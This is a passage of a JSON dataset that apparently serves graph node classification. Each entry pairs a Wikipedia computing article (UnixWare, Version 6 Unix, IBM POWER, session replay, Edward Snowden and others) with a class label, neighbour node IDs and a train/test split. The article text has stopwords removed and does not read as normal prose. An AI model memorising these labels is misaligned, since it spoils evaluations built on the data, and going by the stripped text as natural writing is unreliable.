maintenance updates support 2007 2011 sco group engaged series legal battles september 2007 sco group filed chapter 11 bankruptcy protection 11 april 2011 unxis bought sco group operating assets intellectual property rights approved bankruptcy court delaware sco group inc. renamed tsg group inc. sco operations inc. became tsg operations inc. august 2012 filed convert chapter 11 chapter 7 rights unixware well openserver acquired unxis 2011 june 2013 unxis renamed xinuos announced product availability sco unixware 7.1.4+ supporting physical virtual machines versions unixware included significant open source components including bind/x11/sendmail/dhcp/perl/tcl others later releases bundled numerous additional open source applications including apache samba mysql postgresql openssh mozilla software versions sco operating system distributions including unixware also extensive set open source packages available free download via sco skunkware site",
    "neighbors": [
      2560,
      7682,
      8725,
      1561,
      7204,
      7224,
      9784,
      2120,
      6218,
      2132,
      1109,
      9817,
      10851,
      11363,
      6760,
      118,
      9335,
      633,
      640,
      2179,
      132,
      6787,
      671,
      7848,
      3241,
      3248,
      692,
      10436,
      3791,
      6369,
      9444,
      11501,
      5363,
      4857,
      2301,
      11013,
      6412,
      8976,
      787,
      5397,
      1304,
      8991,
      7460,
      6445,
      7983,
      10033,
      823,
      7483,
      9027,
      2378,
      8012,
      8020,
      11608,
      2395,
      8539,
      865,
      7022,
      5492,
      2424,
      6521,
      10111,
      5506,
      8582,
      10631,
      11145,
      7566,
      9106,
      414,
      3487,
      3488,
      6049,
      5036,
      10156,
      1971,
      2995,
      9141,
      9151,
      10698,
      470,
      5078,
      6624,
      1508,
      1509,
      4076,
      2035
    ],
    "mask": "Test"
  },
  {
    "node_id": 3488,
    "label": 2,
    "text": "Version_6_Unix:version 6 unix sixth edition unix also called version 6 unix v6 first version unix operating system see wide release outside bell labs released may 1975 like direct predecessor targeted dec pdp-11 family minicomputers superseded version 7 unix 1978/1979 although v6 systems remained regular operation least 1985 corporation licensed version 5 unix educational institutions licensed version 6 also commercial users 20,000 remained widely used version 1980s enhanced v6 basis first ever commercially sold unix version interactive is/1 bell pwb/unix 1.0 also based v6 earlier unreleased versions based v4 v5 whitesmiths produced marketed binary-compatible v6 clone name idris code original v6 unix made available bsd license sco group see ancient unix systems since source code available license explicit enough forbid v6 taken teaching tool notably university california berkeley johns hopkins university university new south wales unsw uc berkeley distributed set add-on programs called first berkeley software distribution 1bsd later became full-fledged operating system distribution unsw professor john lions famous commentary unix 6th edition edited selection main parts kernel implemented digital pdp-11/40 main source kernel documentation many early unix developers due license restrictions later unix versions book mainly distributed samizdat photo-copying 1977 richard miller ross nealon working supervision professor juris reinfelds wollongong university completed port v6 unix interdata 7/32 thus proving portability unix new systems programming language c practice wollongong interdata unix level 6 also included utilities developed wollongong later releases features v7 notably c compiler wollongong unix first ever port platform pdp series computers proving portable operating systems indeed feasible c language write 1980 version licensed wollongong group palo alto published edition 7 around time bell labs port interdata 8/32 completed externally released goal port improve portability unix generally well produce portable version c compiler resulting portable c compiler pcc distributed v7 many later versions unix used produce unix/32v port vax third unix portability project completed princeton n.j. 1976–1977 unix kernel adapted run guest operating ibm vm/370 virtualization environment version became nucleus amdahl first internal unix offering see amdahl uts bell labs developed several variants v6 including stripped-down mini-unix low-end pdp-11 models lsi-unix lsx lsi-11 real-time operating system unix/rt merged v6 unix earlier mert hypervisor decided distribution bell labs number pre-v7 bug fixes would constitute support disallowed antitrust settlement tape patchset slipped lou katz usenix distributed university sydney released australian unix share accounting method ausam november 1979 v6 variant improved security process accounting eastern bloc clones v6 unix appeared local-built pdp-11 clones mnos later augmented partial compatibility bsd unix elektronika bk personal computer bkunix based lsx v6 used teaching mit 2002 2006 subsequently replaced x86 clone called xv6",
    "neighbors": [
      7552,
      2179,
      132,
      6787,
      6412,
      6675,
      8852,
      5397,
      9366,
      10391,
      1304,
      3487,
      1952,
      8991,
      7460,
      7848,
      3241,
      5293,
      7983,
      3248,
      7217,
      2995,
      9141,
      823,
      7224,
      9784,
      9151,
      9027,
      10436,
      1865,
      8522,
      3659,
      8012,
      1360,
      10835,
      2132,
      11604,
      6617,
      8414,
      8671,
      6369,
      9444,
      7655,
      8553,
      4076,
      9452,
      2035,
      5492,
      2424,
      633,
      4859,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3489,
    "label": 4,
    "text": "Norton_Confidential:norton confidential norton confidential program designed encrypt passwords online detect phishing sites",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3490,
    "label": 8,
    "text": "Session_replay:session replay session replay ability replay visitor journey web site within mobile application web application replay include user view browser screen output user input keyboard mouse inputs logs network events console logs supposed help improve customer experience identify obstacles conversion processes websites however also used study web site usability customer behavior well handling customer service questions customer journey interactions replayed organizations even use capability analyse fraudulent behavior websites solutions augment session replay advanced analytics identify segments customers struggling use website means replay capability used much efficiently reduce need replay customer sessions unnecessarily generally two ways capture replay visitor sessions client side tag-free server side many tag-based solutions offer video-like replay visitors session replay analogous video accurately reproduction specific user experience mouse movements clicks taps scrolls underlying data session recordings captured tagging pages advanced tools able access dom directly play back interactions within dom including mutations high degree accuracy number tools provide similar functions advantage replay movie-like format full client experience also deal modern single-page applications disadvantage tracking script easily detected blocked ad blocker becomes normal 2017 615m devices active adblock solutions capture website traffic replay every visitor interaction every device including mobile users location sessions replayed step-by-step providing ability search locate analyse aspects visitors session including clicks form entry server-side solutions require hardware software installed premises advantage server-side recording solution ca n't blocked unfortunately wo n't able see video like replay client-side activities scrolling mouse movements deals badly modern single-page applications hybrid approach combines advantages without weaknesses hybrid approach ensures every session recorded important compliance server-side capturing enriched client-side tracking data mouse movements clicks scrolling key strokes user behavior driven customer experience insights works well modern single-page applications benefit movie-like replay additionally ensure 100 compliant capturing deployed either premises saas tools listed available software service saas solutions",
    "neighbors": [
      5536,
      845,
      6576,
      8978,
      467,
      7828,
      10450,
      8694
    ],
    "mask": "Train"
  },
  {
    "node_id": 3491,
    "label": 7,
    "text": "Cross-platform_support_middleware:cross-platform support middleware cross-platform support middleware cpsm software abstraction layer guarantees existence correct implementation set services top set platforms abstraction method cpsm development method used compile concrete source code given platform without compromising abstract interfaces provided commonly used abstraction methods cpsm development conditional compilation directory separation sources first method consists embedding preprocessor instructions source code conditionally select source subtree compatible given platform second method takes advantage filesystem organization divide source code different folders one incompatible platform thus delegating selection problem build system distributions like msys cygwin may help build cross-platform code unix-like environment even microsoft windows distributions provide decent version gnu make direct build process cross-platform fashion",
    "neighbors": [
      6403,
      10480,
      9587,
      5397,
      3734
    ],
    "mask": "Test"
  },
  {
    "node_id": 3492,
    "label": 5,
    "text": "Seamoby:seamoby seamoby candidate access router discovery card experimental protocol outlined rfc 4065 rfc 4066 protocol designed speed hand ip devices wireless access routers protocol defines mechanism used access router automatically discover neighbor help mobile devices based trigger mobile devices scan neighbor access points report list newly found access point identifiers connected access router connected access router performs reverse look using ap id identify candidate access routers connected newfound access points connected access router updates neighbor list ip address capability newly found access routers neighbor list used inter-ar handover decision making similar idea currently used 3gpp son protocol aka anr discovering candidate access points however anr protocol extends rrc x2 protocols support card-like functionality l2 network",
    "neighbors": [
      5472,
      5402
    ],
    "mask": "None"
  },
  {
    "node_id": 3493,
    "label": 3,
    "text": "IBM_POWER_instruction_set_architecture:ibm power instruction set architecture ibm power isa reduced instruction set computer risc instruction set architecture isa developed ibm name acronym performance optimization enhanced risc isa used base high end microprocessors ibm 1990s used many ibm servers minicomputers workstations supercomputers processors called power1 rios-1 rios.9 rsc rad6000 power2 power2 power2+ p2sc isa evolved powerpc instruction set architecture deprecated 1998 ibm introduced power3 processor mainly 32/64 bit powerpc processor included power isa backwards compatibility power isa abandoned ibm continues develop powerpc microprocessor cores use application-specific integrated circuit asic offerings many high volume applications embed powerpc cores 1974 ibm started project design objective creating large telephone-switching network potential capacity deal least 300 calls per second projected 20,000 machine instructions would required handle call maintaining real-time response processor performance 12 mips deemed necessary requirement extremely ambitious time realised much complexity contemporary cpus could dispensed since machine would need perform i/o branches add register-register move data registers memory would need special instructions perform heavy arithmetic simple design philosophy whereby step complex operation specified explicitly one machine instruction instructions required complete constant time would later come known risc 1975 telephone switch project canceled without prototype estimates simulations produced project first year however looked processor designed project could promising general-purpose processor work continued thomas j. watson research center building 801 801 project two years watson research center superscalar limits 801 design explored feasibility implementing design using multiple functional units improve performance similar done ibm system/360 model 91 cdc 6600 although model 91 based cisc design determine risc machine could maintain multiple instructions per cycle design changes need made 801 design allow multiple-execution-units increase performance cheetah separate branch fixed-point floating-point execution units many changes made 801 design allow multiple-execution-units cheetah originally planned manufactured using bipolar emitter-coupled logic ecl technology 1984 complementary metal–oxide–semiconductor cmos technology afforded increase level circuit integration improving transistor-logic performance 1985 research second-generation risc architecture started ibm thomas j. watson research center producing america architecture 1986 ibm austin started developing rs/6000 series based architecture february 1990 first computers ibm incorporate power instruction set called risc system/6000 rs/6000 rs/6000 computers divided two classes workstations servers hence introduced powerstation powerserver rs/6000 cpu 2 configurations called rios-1 rios.9 commonly power1 cpu rios-1 configuration total 10 discrete chips instruction cache chip fixed-point chip floating-point chip 4 data cache chips storage control chip input/output chips clock chip lower cost rios.9 configuration 8 discrete chips instruction cache chip fixed-point chip floating-point chip 2 data cache chips storage control chip input/output chip clock chip single-chip implementation rios rsc risc single chip developed lower-end rs/6000 first machines using rsc released 1992 ibm started power2 processor effort successor power1 two years creation 1991 apple/ibm/motorola alliance austin texas despite impacted diversion resources jump start apple/ibm/motorola effort power2 took five years start system shipment adding second fixed-point unit second floating point unit performance enhancements design power2 leadership performance announced november 1993 new instructions also added instruction set support rs/6000 rs/6000 sp2 product lines 1996 ibm design team implement single-chip version power2 p2sc power2 super chip outside apple/ibm/motorola alliance ibm advanced dense cmos-6s process p2sc combined separate power2 instruction cache fixed point floating point storage control data cache chips onto one huge die time introduction p2sc largest highest transistor count processor industry despite challenge size complexity advanced cmos process first tape-out version processor able shipped leadership floating point performance time announced p2sc processor used 1997 ibm deep blue chess playing supercomputer beat chess grandmaster garry kasparov twin sophisticated maf floating point units huge wide low latency memory interfaces p2sc primarily targeted engineering scientific applications p2sc eventually succeeded power3 included 64-bit smp capability full transition powerpc addition p2sc sophisticated twin maf floating point units power design descended directly 801 cpu widely considered first true risc processor design 801 used number applications inside ibm hardware time pc/rt released ibm started america project design powerful cpu market interested primarily fixing two problems 801 design floating point became focus america project ibm able use new algorithms developed early 1980s could support 64-bit double-precision multiplies divides single cycle fpu portion design separate instruction decoder integer parts allowing decoder send instructions fpu alu integer execution units time ibm complemented complex instruction decoder could fetching one instruction decoding another sending one alu fpu time resulting one first superscalar cpu designs use system used 32 32-bit integer registers another 32 64-bit floating point registers unit branch unit also included number private registers use including program counter another interesting feature architecture virtual address system maps addresses 52-bit space way applications share memory flat 32-bit space programs different blocks 32 bits appendix e book powerpc user instruction set architecture powerpc architecture book version 2.02 describes differences power power2 instruction set architectures version powerpc instruction set architecture implemented power5",
    "neighbors": [
      6663,
      5642,
      9739,
      1548,
      1563,
      4144,
      6715,
      7234,
      3142,
      9302,
      8792,
      1635,
      3185,
      4211,
      5235,
      2179,
      4743,
      9351,
      2708,
      9371,
      8861,
      6815,
      6311,
      682,
      4269,
      9391,
      2224,
      5297,
      9397,
      9911,
      1725,
      6878,
      10985,
      9964,
      5358,
      9455,
      8944,
      757,
      249,
      3323,
      6914,
      8450,
      4868,
      10501,
      3846,
      4881,
      1298,
      1309,
      6949,
      1321,
      10543,
      10040,
      9020,
      5450,
      8523,
      336,
      8530,
      342,
      11613,
      869,
      8048,
      4465,
      1399,
      3960,
      8058,
      3451,
      3457,
      1933,
      5006,
      3472,
      7065,
      3493,
      8102,
      936,
      11184,
      4017,
      1461,
      1462,
      8120,
      1983,
      1985,
      6084,
      10180,
      3014,
      6607,
      3540,
      2517,
      10214,
      2039,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 3494,
    "label": 7,
    "text": "ReplicaNet:replicanet distributed computing distributed object systems designed allow software modules objects work together objects located different computers connected network interactive computer simulations computer games use object-oriented programming languages c++ maintain database entities player characters monsters tanks anything exist simulated world using object description language programmatically registering filter classes machine knows create update c++ class object object treated potential network shareable object machine allocates machine control c++ classes change variables call member functions normal object ready shared machines object published replicanet network session underlying replicanet software detects changes object automatically updates replicated classes machines connected network session changes made member variables c++ classes extrapolated replicanet using several pre-defined filters reduce amount network traffic transmitting changes object approach describing objects processed computers similar systems corba java remote method invocation distributed component object model 2011 game developer magazine announced replicanet 7.0 one networking finalists front line awards honors best networking middleware computer games industry game programming c++ start finish erik yuzwa http //gameprogrammingstarttofinish.wazooinc.com/ massively multiplayer game development 2 page 220 charles river media",
    "neighbors": [
      10024,
      2980,
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3495,
    "label": 4,
    "text": "Edward_Snowden:edward snowden edward joseph snowden born june 21 1983 american whistle-blower copied leaked highly classified information national security agency nsa 2013 central intelligence agency cia employee subcontractor disclosures revealed numerous global surveillance programs many run nsa five eyes intelligence alliance cooperation telecommunication companies european governments prompted cultural discussion national security individual privacy 2013 snowden hired nsa contractor booz allen hamilton previous employment dell cia snowden says gradually became disillusioned programs involved tried raise ethical concerns internal channels ignored may 20 2013 snowden flew hong kong leaving job nsa facility hawaii early june revealed thousands classified nsa documents journalists glenn greenwald laura poitras ewen macaskill snowden came international attention stories based material appeared guardian washington post disclosures made publications including der spiegel new york times snowden 30th birthday june 21 2013 u.s. department justice unsealed charges snowden two counts violating espionage act 1917 theft government property following department state revoked passport two days later flew moscow sheremetyevo airport russian authorities noted u.s. passport cancelled restricted airport terminal one month russia later granted snowden right asylum initial visa residence one year repeated extensions permitted stay least 2020 early 2016 became president freedom press foundation san francisco-based organization states purpose protect journalists hacking government surveillance 2017 living undisclosed location moscow edward joseph snowden born june 21 1983 elizabeth city north carolina maternal grandfather edward j. barrett rear admiral u.s. coast guard became senior official fbi pentagon 2001 september 11 attacks snowden father lonnie also officer coast guard mother elizabeth clerk u.s. district court district maryland older sister jessica lawyer federal judicial center washington d.c. edward snowden said expected work federal government rest family parents divorced 2001 father remarried snowden scored 145 two separate iq tests early 1990s still grade school snowden moved family area fort meade maryland mononucleosis caused miss high school almost nine months rather returning school passed ged test took classes anne arundel community college although snowden undergraduate college degree worked online toward master degree university liverpool england 2011 interested japanese popular culture studied japanese language worked anime company resident office u.s also said basic understanding mandarin chinese deeply interested martial arts age 20 listed buddhism religion military recruitment form noting choice agnostic strangely absent snowden said 2008 presidential election voted third-party candidate though believed obama promises following election believed president barack obama continuing policies espoused george w. bush accounts published june 2013 interviewers noted snowden laptop displayed stickers supporting internet freedom organizations including electronic frontier foundation eff tor project week publication leaks began ars technica confirmed snowden active participant site online forum 2001 may 2012 discussing variety topics pseudonym thetruehooha january 2009 entry thetruehooha exhibited strong support u.s. security state apparatus said leakers classified information shot balls however snowden disliked obama cia director appointment leon panetta saying obama named fucking politician run cia snowden also offended possible ban assault weapons writing lunatic gun-toting nra compatriots would steps congress c-span feed finished snowden disliked obama economic policies social security favored ron paul call return gold standard 2014 snowden supported basic income feeling duty fight iraq war help free oppressed people snowden enlisted united states army reserve may 7 2004 became special forces candidate 18x enlistment option complete training breaking legs training accident discharged september 28 2004 snowden employed less year 2005 security guard university maryland center advanced study language research center sponsored national security agency nsa according university classified facility though heavily guarded june 2014 snowden told wired job security guard required high-level security clearance passed polygraph exam underwent stringent background check attending 2006 job-fair focused intelligence agencies snowden accepted offer position cia agency assigned global communications division cia headquarters langley virginia may 2006 snowden wrote ars technica trouble getting work computer wizard distinguishing junior employee top computer-team snowden sent cia secret school technology specialists lived hotel six months studying training full-time march 2007 cia stationed snowden diplomatic cover geneva switzerland responsible maintaining computer-network security assigned u.s permanent mission united nations diplomatic mission representing u.s. interests un international organizations snowden received diplomatic passport four-bedroom apartment near lake geneva according greenwald snowden considered top technical cybersecurity expert country hand-picked cia support president 2008 nato summit romania snowden described cia experience geneva formative stating cia deliberately got swiss banker drunk encouraged drive home snowden said latter arrested cia operative offered help exchange banker becoming informant ueli maurer president swiss confederation year 2013 june year publicly disputed snowden claims would mean cia successfully bribed geneva police judiciary due respect ca n't imagine said maurer february 2009 snowden resigned cia 2009 snowden began work contractee dell manages computer systems multiple government agencies assigned nsa facility yokota air base near tokyo snowden instructed top officials military officers defend networks chinese hackers four years dell rose supervising nsa computer system upgrades working résumé termed cyberstrategist expert cyber counterintelligence several u.s. locations 2011 returned maryland spent year lead technologist dell cia account capacity consulted chiefs cia technical branches including agency chief information officer chief technology officer u.s. officials sources familiar investigation said snowden began downloading documents describing government electronic spying programs working dell april 2012 investigators estimated 50,000 200,000 documents snowden gave greenwald poitras copied snowden working dell march 2012 dell reassigned snowden hawaii lead technologist nsa information-sharing office time departure u.s. may 2013 employed 15 months inside nsa hawaii regional operations center focuses electronic monitoring china north korea last three consulting firm booz allen hamilton intelligence officials described position system administrator snowden said infrastructure analyst meant job look new ways break internet telephone traffic around world march 15 2013—three days later called breaking point seeing director national intelligence james clapper directly lie oath congress —snowden quit job dell although said career high annual salary 200,000 snowden said took pay cut work booz allen sought employment order gather data release details nsa worldwide surveillance activity anonymous source told reuters hawaii snowden may persuaded 20–25 co-workers give logins credentials telling needed job nsa sent memo congress saying snowden tricked fellow employee sharing personal public key infrastructure certificate gain greater access nsa computer system snowden disputed memo saying january 2014 never stole passwords trick army co-workers booz allen terminated snowden employment june 10 2013 one month left country former nsa co-worker said although nsa full smart people snowden genius among geniuses created widely implemented backup system nsa often pointed security flaws agency former colleague said snowden given full administrator privileges virtually unlimited access nsa data snowden offered position nsa elite team hackers tailored access operations turned join booz allen anonymous source later said booz allen hiring screeners found possible discrepancies snowden resume still decided hire snowden résumé stated attended computer-related classes johns hopkins university spokeswoman johns hopkins said university find records show snowden attended university suggested may instead attended advanced career technologies private for-profit organization operated computer career institute johns hopkins university university maryland university college acknowledged snowden attended summer session um campus asia snowden résumé stated estimated would receive university liverpool computer security master degree 2013 university said snowden registered online master degree program computer security 2011 inactive student completed program snowden said told multiple employees two supervisors concerns nsa disputes claim snowden elaborated january 2014 saying made tremendous efforts report programs co-workers supervisors anyone proper clearance would listen reactions told scale constitutional violations ranged deeply concerned appalled one willing risk jobs families possibly even freedom go thomas andrews drake march 2014 testimony european parliament snowden wrote revealing classified information reported clearly problematic programs ten officials said nothing response may 2014 interview snowden told nbc news bringing concerns legality nsa spying programs officials told stay silent matter asserted nsa copies emails sent office general counsel oversight compliance personnel broaching concerns nsa interpretations legal authorities raised complaints officially writing email supervisors colleagues one office may 2014 u.s. officials released single email snowden written april 2013 inquiring legal authorities said found evidence snowden expressed concerns someone oversight position june 2014 nsa said able find records snowden raising internal complaints agency operations month snowden explained produced communiqués question ongoing nature dispute disclosing first time working nsa regard records 're going back forth n't want reveal everything come may 2014 interview nbc news snowden accused u.s. government trying use one position career distract totality experience downplaying low level analyst words trained spy traditional sense word lived worked undercover overseas—pretending work job 'm not—and even assigned name mine said 'd worked nsa undercover overseas dia developed sources methods keep information people secure hostile dangerous environments around world say 'm low-level systems administrator n't know 'm talking 'd say somewhat misleading june interview globo tv snowden reiterated actually functioning senior level july interview guardian snowden explained nsa career began move merely overseeing systems actively directing use many people ’ understand actually analyst designated individuals groups targeting snowden subsequently told wired dell 2011 would sit cio cia cto cia chiefs technical branches would tell hardest technology problems job come way fix time nsa analyst directing work others snowden recalled moment colleagues began severe ethical doubts snowden said 18 22-year-old analysts suddenly thrust position extraordinary responsibility access private records course daily work stumble across something completely unrelated sort necessary sense—for example intimate nude photo someone sexually compromising situation 're extremely attractive turn around chair show co-worker ... sooner later person whole life seen people snowden observed behavior happened routinely every two months never reported considered one fringe benefits work exact size snowden disclosure unknown australian officials estimated 15,000 australian intelligence files british officials estimate least 58,000 british intelligence files nsa director keith alexander initially estimated snowden copied anywhere 50,000 200,000 nsa documents later estimates provided u.s. officials order 1.7 million number originally came department defense talking points july 2014 washington post reported cache previously provided snowden domestic nsa operations consisting roughly 160,000 intercepted e-mail instant-message conversations hundreds pages long 7,900 documents taken 11,000 online accounts u.s. defense intelligence agency report declassified june 2015 said snowden took 900,000 department defense files downloaded nsa march 2014 army general martin dempsey chairman joint chiefs staff told house armed services committee vast majority documents snowden ... exfiltrated highest levels security ... nothing exposing government oversight domestic activities vast majority related military capabilities operations tactics techniques procedures asked may 2014 interview quantify number documents snowden stole retired nsa director keith alexander said accurate way counting took snowden may downloaded million documents according snowden indiscriminately turn documents journalists stating carefully evaluated every single document disclosed ensure legitimately public interest sorts documents would made big impact n't turn screen everything releasing journalists ... time go information would like make available journalists country despite measures improper redaction document new york times resulted exposure intelligence activity al-qaeda june 2014 nsa recently installed director u.s. navy admiral michael s. rogers said terrorist groups altered communications avoid surveillance techniques revealed snowden damage done significant enough conclude sky falling nevertheless february 2015 rogers said snowden disclosures material impact nsa detection evaluation terrorist activities worldwide 14 june 2015 uk sunday times reported russian chinese intelligence services decrypted 1 million classified files snowden cache forcing uk mi6 intelligence agency move agents live operations hostile countries sir david omand former director uk gchq intelligence gathering agency described huge strategic setback harming britain america nato allies sunday times said clear whether russia china stole snowden data whether snowden voluntarily handed remain liberty hong kong moscow april 2015 henry jackson society british neoconservative think tank published report claiming snowden intelligence leaks negatively impacted britain ability fight terrorism organized crime gus hosein executive director privacy international criticized report opinion presuming public became concerned privacy snowden disclosures snowden decision leak nsa documents developed gradually following march 2007 posting technician geneva cia station snowden first made contact glenn greenwald journalist working guardian december 1 2012 contacted greenwald anonymously cincinnatus said sensitive documents would like share greenwald found measures source asked take secure communications encrypting email annoying employ snowden contacted documentary filmmaker laura poitras january 2013 according poitras snowden chose contact seeing new york times article nsa whistleblower william binney originally attracted snowden greenwald poitras salon article written greenwald detailing poitras controversial films made target government greenwald began working snowden either february april 2013 poitras asked greenwald meet new york city point snowden began providing documents barton gellman writing washington post says first direct contact may 16 2013 according gellman snowden approached greenwald post declined guarantee publication within 72 hours 41 powerpoint slides snowden leaked exposing prism electronic data mining program publish online encrypted code allowing snowden later prove source snowden communicated using encrypted email going codename verax asked quoted length fear identification stylometry according gellman prior first meeting person snowden wrote understand made suffer actions return information public marks end snowden also told gellman articles published journalists working would also mortal risk united states intelligence community think single point failure could stop disclosure make sole owner information may 2013 snowden permitted temporary leave position nsa hawaii pretext receiving treatment epilepsy mid-may snowden gave electronic interview poitras jacob appelbaum published weeks later der spiegel disclosing copied documents snowden promised nothing would stop subsequent disclosures june 2013 said say right us government going able cover jailing murdering truth coming stopped may 20 2013 snowden flew hong kong staying initial articles based leaked documents published beginning guardian june 5 greenwald later said snowden disclosed 9,000 10,000 documents within months documents obtained published media outlets worldwide notably guardian britain der spiegel germany washington post new york times u.s. globo brazil le monde france similar outlets sweden canada italy netherlands norway spain australia 2014 nbc broke first story based leaked documents february 2014 reporting based snowden leaks journalists glenn greenwald laura poitras barton gellman guardian′ ewen macaskill honored co-recipients 2013 george polk award dedicated snowden nsa reporting journalists also earned guardian washington post 2014 pulitzer prize public service exposing widespread surveillance helping spark huge public debate extent government spying guardian chief editor alan rusbridger credited snowden performed public service ongoing publication leaked documents revealed previously unknown details global surveillance apparatus run united states nsa close cooperation three four five eyes partners australia asd uk gchq canada csec june 5 2013 media reports documenting existence functions classified surveillance programs scope began continued throughout entire year first program revealed prism allows court-approved direct access americans google yahoo accounts reported washington post guardian published one hour apart barton gellman washington post first journalist report snowden documents said u.s. government urged specify name companies involved gellman decided name would make real americans reports also revealed details tempora british black-ops surveillance program run nsa british partner gchq initial reports included details nsa call database boundless informant secret court order requiring verizon hand nsa millions americans phone records daily surveillance french citizens phone internet records high-profile individuals world business politics xkeyscore analytical tool allows collection almost anything done internet described guardian program shed light one snowden controversial statements sitting desk could wiretap anyone accountant federal judge even president personal email nsa top-secret black budget obtained snowden washington post exposed successes failures 16 spy agencies comprising u.s. intelligence community revealed nsa paying u.s. private tech companies clandestine access communications networks agencies allotted 52 billion 2013 fiscal year revealed nsa harvesting millions email instant messaging contact lists searching email content tracking mapping location cell phones undermining attempts encryption via bullrun agency using cookies piggyback tools used internet advertisers pinpoint targets government hacking bolster surveillance nsa shown secretly accessing yahoo google data centers collect information hundreds millions account holders worldwide tapping undersea cables using muscular surveillance program nsa cia gchq spied users second life xbox live world warcraft attempted recruit would-be informants sites according documents revealed december 2013 leaked documents showed nsa agents also spied love interests practice nsa employees termed loveint nsa shown tracking online sexual activity people termed radicalizers order discredit following revelation black pearl program targeting private networks nsa accused extending beyond primary mission national security agency intelligence-gathering operations targeted among others oil giant petrobras brazil largest company nsa gchq also shown surveilling charities including unicef médecins du monde well allies european commissioner joaquín almunia israeli prime minister october 2013 glenn greenwald said shocking significant stories ones still working yet publish november guardian editor-in-chief alan rusbridger said one percent documents published december australia minister defence david johnston said government assumed worst yet come october 2013 snowden disclosures created tensions u.s. close allies revealed u.s. spied brazil france mexico britain china germany spain well 35 world leaders notably german chancellor angela merkel said spying among friends unacceptable compared nsa stasi leaked documents published der spiegel 2014 appeared show nsa targeted 122 high-ranking leaders nsa mission statement titled sigint strategy 2012-2016 affirmed nsa plans continued expansion surveillance activities stated goal dramatically increase mastery global network acquire adversaries data anyone anytime anywhere leaked slides revealed greenwald book place hide released may 2014 showed nsa stated objective collect process exploit partner sniff know snowden said january 2014 interview german television nsa limit data collection national security issues accusing agency conducting industrial espionage using example german company siemens said information siemens beneficial us national interests—even n't anything national security—then 'll take information nevertheless wake snowden revelations response inquiry left party germany domestic security agency bundesamt für verfassungsschutz bfv investigated found concrete evidence u.s. conducted economic industrial espionage germany february 2014 testimony european union snowden said remaining undisclosed programs leave public interest determinations may safely disclosed responsible journalists coordination government stakeholders march 2014 documents disclosed glenn greenwald writing intercept showed nsa cooperation gchq plans infect millions computers malware using program called turbine revelations included information quantumhand program nsa set fake facebook server intercept connections according report washington post july 2014 relying information furnished snowden 90 placed surveillance u.s. ordinary americans intended targets newspaper said examined documents including emails message texts online accounts support claim august 2014 interview snowden first time disclosed cyberwarfare program works codenamed monstermind would automate detection foreign cyberattack began automatically fire back attacks spoofed said snowden could someone sitting china example making appear one attacks originating russia end shooting back russian hospital happens next snowden first contemplated leaking confidential documents around 2008 held back partly believed newly elected barack obama might introduce reforms disclosures identity made public guardian request june 9 2013 want live world everything say recorded said sole motive inform public done name done snowden said wanted embolden others step forward demonstrating win also said system reporting problems work report wrongdoing responsible cited lack whistleblower protection government contractors use 1917 espionage act prosecute leakers belief used internal mechanisms sound alarm revelations would buried forever december 2013 upon learning u.s. federal judge ruled collection u.s. phone metadata conducted nsa likely unconstitutional snowden said acted belief nsa mass surveillance programs would withstand constitutional challenge american public deserved chance see issues determined open courts ... today secret program authorized secret court exposed light day found violate americans rights january 2014 snowden said breaking point seeing director national intelligence james clapper directly lie oath congress referred testimony march 12 2013—three months snowden first sought share thousands nsa documents greenwald nine months nsa says snowden made first illegal downloads summer 2012—in clapper denied u.s. senate select committee intelligence nsa wittingly collects data millions americans snowden said saving intelligence community believes lie public legislators need able trust regulate actions seeing really meant going back beyond creeping realization one else going public right know programs march 2014 snowden said reported policy legal issues related spying programs ten officials contractor legal avenue pursue whistleblowing may 2013 snowden took leave absence telling supervisors returning mainland epilepsy treatment instead left hawaii hong kong arrived may 20 snowden told guardian reporters june room mira hotel since arrival city rarely going june 10 correspondent ewen macaskill said snowden left hotel briefly three times since may 20 snowden vowed challenge extradition attempt u.s. government engaged hong kong-based canadian human rights lawyer robert tibbo legal adviser snowden told south china morning post planned remain hong kong long government would permit snowden also told post united states government committed tremendous number crimes hong kong prc well going identify chinese internet protocol addresses nsa monitored stating nsa collected text-message data hong kong residents glenn greenwald said snowden motivated need ingratiate people hong kong china leaving mira hotel snowden stayed cramped apartment refugees seeking asylum hong kong arrangement set tibbo hide authorities russian newspaper kommersant nevertheless reported snowden living russian consulate shortly departure hong kong moscow ben wizner lawyer american civil liberties union aclu legal adviser snowden said january 2014 every news organization world trying confirm story n't able false ref name= mayer/new yorker /ref likewise rejecting kommersant story anatoly kucherena became snowden lawyer july 2013 snowden asked help seeking temporary asylum russia kucherena said snowden communicate russian diplomats hong kong early september 2013 however russian president vladimir putin said days boarding plane moscow snowden met hong kong russian diplomatic representatives june 22 18 days publication snowden nsa documents began officials revoked u.s. passport june 23 snowden boarded commercial aeroflot flight su213 moscow accompanied sarah harrison wikileaks hong kong authorities said snowden detained u.s. request fully complied hong kong law legal basis prevent snowden leaving june 24 u.s. state department spokesman rejected explanation technical noncompliance accusing hong kong government deliberately releasing fugitive despite valid arrest warrant sufficient time prohibit travel day julian assange said wikileaks paid snowden lodging hong kong flight october 2013 snowden said flying moscow gave classified documents obtained journalists met hong kong kept copies january 2014 told german tv interviewer gave information american journalists reporting american issues first american tv interview may 2014 snowden said protected russian leverage destroying material holding landing moscow june 23 2013 snowden landed moscow sheremetyevo airport wikileaks said circuitous safe route asylum ecuador snowden seat reserved continue cuba board onward flight saying january 2014 interview intended transit russia stopped en route asserted planeload reporters documented seat supposed ticketed havana u.s. cancelled passport said u.s. wanted stay moscow could say 'he russian spy greenwald account differed point snowden already ticketed according greenwald snowden passport valid departed hong kong revoked hours transit moscow preventing obtaining ticket leave russia greenwald said snowden thus forced stay moscow seek asylum according one russian report snowden planned fly moscow havana latin america however cuba told moscow would allow aeroflot plane carrying snowden land russian newspaper kommersant reported cuba change heart receiving pressure u.s. officials leaving stuck transit zone last minute havana told officials moscow allow flight washington post contrasted version called widespread speculation russia never intended let snowden proceed fidel castro called claims cuba would blocked snowden entry lie libel describing snowden arrival moscow surprise likening unwanted christmas gift russian president putin said snowden remained transit area sheremetyevo airport committed crime russia free leave putin denied russia intelligence agencies worked working snowden following snowden arrival moscow white house expressed disappointment hong kong decision allow leave anonymous u.s. official authorized discuss matter told ap snowden passport revoked left hong kong senior official country airline could order subordinates overlook withdrawn passport u.s. secretary state john kerry said snowden passport cancelled within two hours charges snowden made public friday june 21 july 1 statement snowden said although convicted nothing u.s. government unilaterally revoked passport 